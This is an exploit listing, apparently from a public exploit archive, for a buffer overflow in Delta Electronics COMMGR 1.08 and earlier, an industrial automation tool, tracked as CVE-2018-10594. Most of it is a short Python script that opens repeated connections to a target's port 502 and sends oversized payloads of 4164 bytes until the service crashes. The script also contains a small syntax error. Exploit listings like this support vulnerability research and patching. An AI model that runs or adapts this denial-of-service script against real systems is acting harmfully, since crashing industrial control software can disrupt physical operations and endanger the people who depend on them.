Delta Electronics Delta Industrial Automation COMMGR 1.08 Buffer Overflow

Delta Electronics Delta Industrial Automation COMMGR versions 1.08 and below suffer from a buffer overflow vulnerability.


MD5 | 8813546854099e80dd5eea909b672bae

# Exploit Title: Delta Electronics Delta Industrial Automation COMMGR
- Remote STACK-BASED BUFFER OVERFLOW
# Date: 02.07.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.deltaww.com/
# Software Link:
http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=2093&DocPath=1&hl=en-US
# Version:
COMMGR Version 1.08 and prior.
DVPSimulator EH2, EH3, ES2, SE, SS2
AHSIM_5x0, AHSIM_5x1
# Tested on: Kali Linux
# CVE : CVE-2018-10594


#Run exploit, result DOS

import socket


ip = raw_input("[+] IP to attack: ")

sarr = []
i = 0
while True:
try:
sarr.append(socket.create_connection((ip,502)))
print "[+] Connection %d" % i
crash1 = "\x41"*4164"
sarr[i].send(crash1+'\r\n')
i+=1
except socket.error:
print "[*] Server crashed "
raw_input()
break

Related Posts